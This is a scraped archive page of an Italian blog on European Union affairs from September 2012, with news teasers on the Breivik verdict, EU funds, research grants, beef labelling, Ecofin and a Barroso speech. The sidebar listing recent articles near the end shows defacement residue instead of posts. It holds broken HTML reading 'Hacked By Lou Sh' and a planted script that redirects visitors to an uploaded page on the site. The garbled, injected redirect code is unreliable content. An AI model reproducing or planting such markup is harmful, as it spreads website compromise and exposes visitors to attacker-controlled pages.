EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Settembre 2012
it

I maggiori quotidiani europei hanno accolto favorevolmente la condanna a 21 anni di carcere inflitta all'autore delle stragi di Oslo ed Utoya. E hanno cercato di delineare un profilo psicologico di Breivik con l'aiuto di specialisti.

’The Guardian’ Anders Behring Breivik è stato dichiarato sano di mente. Da tale premessa, fondamentale per l’esito del processo che ha visto come protagonista il terrorista norvegese, è partito ’The Guardian’, che si è distinto per non essersi limitato a stigmatizzare la strage e ad accogliere (...)

it

Il Fondo europeo di adeguamento alla globalizzazione (FEG) ogni anno aiuta i lavoratori nella ricerca di un nuovo impiego, sostenendoli nel percorso di riqualificazione in caso di perdita del lavoro. Lo strumento assistenziale ha una dotazione pari a 500 milioni di euro annui, destinati a bilanciare gli effetti derivanti dalle attività della nuova economia.

Il Fondo è legato ai mutamenti strutturali del commercio mondiale e alla crisi economico-finanziaria in corso. Esso è preposto al finanziamento di misure quali l’assistenza nella ricerca di un impiego, l’orientamento professionale, la formazione e riqualificazione su misura, il tutoraggio e la (...)

it

È un maxifinanziamento quello annunciato il 10 settembre scorso dal CER – Consiglio europeo della ricerca. L’Istituto europeo ha infatti stanziato ben 800 milioni di euro da destinare a 536 giovani ricercatori, attentamente selezionati da 25 commissioni composte da scienziati di fama mondiale. 4.741 il totale delle richieste di sovvenzioni pervenute e un solo criterio per operare la selezione: premiare l’eccellenza.

Il Consiglio europeo della ricerca: panoramica storica Era il febbraio del 2007 quando la Commissione europea, nell’ambito del 7° programma quadro per la ricerca, istituiva la prima agenzia dell’Ue interamente dedicata al supporto della ricerca scientifica di frontiera, svolta su iniziativa dei (...)

it

Con uno scarto minimo di voti, l’Europarlamento si è espresso in modo contrario al mantenimento dell’etichettatura facoltativa sulle carni bovine introdotta agli inizi del 2000 dopo l’allarme “mucca pazza” per assicurare al cittadino europeo un’informazione chiara e trasparente del prodotto alimentari in vendita.

Il Parlamento europeo, con una differenza di soli otto voti, ha bocciato, nella giornata dell’11 settembre scorso, l’emendamento che prevedeva l’osservanza di norme relative all’apposizione sulle carni bovine di una etichettatura facoltativa. Così facendo è stato di fatto penalizzato il consumatore (...)

it

E' notizia di questi giorni la lettera sottoscritta da ben nove Paesi membri UE e indirizzata al Presidente della Commissione europea Josè Manuel Barroso e alla Vicepresidente della Commissione Viviane Reding.

Viviane Reding e Josè Manuel Barroso. La Vicepresidente e il Presidente della Commissione Europea. Loro i maggiori destinatari della lettera d’opposizione dei nove Stati membri. Fonte dell’indiscrezio

it

Non è un caso che il meeting sia avvenuto pochi giorni dopo l'approvazione da parte della Corte Costituzionale tedesca dell'Esm, il Meccanismo europeo di stabilità, giornalisticamente noto come "fondo salva-stati". La situazione europea sembra sempre più incerta, nonostante le rassicurazioni che arrivano sporadicamente da rappresentanti continentali. In particolare è stata analizzata la situazione della Grecia, il Paese che forse più di tutti ha risentito della crisi.

Con l’espressione Ecofin si indica il Consiglio economia e finanza dell’UE, formato dai ministri delle finanza e dell’economia dei diversi Stati membri. Quello che traspare dall’incontro è un cauto ottimismo, che francamente stona con la percezione che i cittadini hanno di questa infinita crisi. In (...)

it

Durante il discorso Barroso ha voluto concentrarsi principalmente sugli effetti della crisi economica e sulla democrazia. Ha voluto esprimere la necessità di “un’Europa più unita” per superare la crisi e conservare la sovranità in un mondo sempre più globalizzato. “Globalizzazione vuol dire più integrazione, e più integrazione vuol dire più democrazia” ha dichiarato. Ha quindi sottolineato l’irreversibilità della moneta unica, ammonendo gli Stati più vulnerabili all’assunzione delle proprie responsabilità, invitandoli a mantenere gli impegni di risanamento ed esortando gli Stati più forti a seguire la strada della solidarietà e della coesione.

Barroso ha ribadito che l’attuale crisi non è solo di natura economica e finanziaria ma anche sociale. Ad essere in crisi è la politica stessa a causa di una mancanza di fiducia da parte dei cittadini per le istituzioni. I cittadini ormai si sentono abbandonati, minacciati, costretti a cambiare (...)

it

Gli obiettivi principali sono tre: sensibilizzare il pubblico al plurilinguismo in Europa, coltivare la diversità culturale e linguistica ed incoraggiare uno studio delle lingue esteso per tutta la vita. Lo scopo principale rimane comunque quello di incoraggiare l’apprendimento delle lingue nel vecchio continente.

In occasione della Giornata una serie di eventi verranno organizzati in tutta Europa: eventi per bambini, programmi radio e televisivi, conferenze, spettacoli, corsi di lingua. Quest’anno ad esempio la Commissione europea organizzerà a Roma una giornata sul tema della “Traduzione audiovisiva” – (...)

it

La manifestazione pacifica si è tenuta proprio davanti all'Eurotower, dove un'orgogliosa Roberta Angelilli (Partito Popolare Europeo-Popolo della Libertà), vicepresidente del Parlamento europeo, ha guidato una vasta schiera di ragazzi pronti a dare il loro contributo per un'Europa migliore. I punti sui quali i protagonisti hanno spinto riguardano temi d'attualità come l'occupazione, problema sempre più grave per le nuove generazioni, e l'attuazione di nuove proposte che siano concrete e al contempo attuabili in breve periodo affinchè i tempi di ripresa si riducano.

"Abbiamo scelto di manifestare sotto la sede della Bce perché le centinaia di giovani giunti qui dall’Italia e da altri Paesi europei riconoscono in Mario Draghi un eroe della battaglia contro la crisi che si è assunto la responsabilità di agire concretamente ed efficacemente. Un esempio che (...)

it

Nota congiunta sottoscritta per assicurare il rispetto della libertà di espressione e di tutti i Profeti e condannare l'incitamento all'odio religioso, che nelle ultime settimane ha favorito atti di violenza e vittime nelle sedi diplomatiche.

Le violenze seguite alla diffusione del film anti-islamico ‘L’innocenza dei musulmani’ e le vignette satiriche di Charlie Hebdo su Maometto hanno imposto la formazione di un fronte comune internazionale per combattere l’odio religioso. Nota congiunta Per contrastare l’escalation di manifestazioni (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France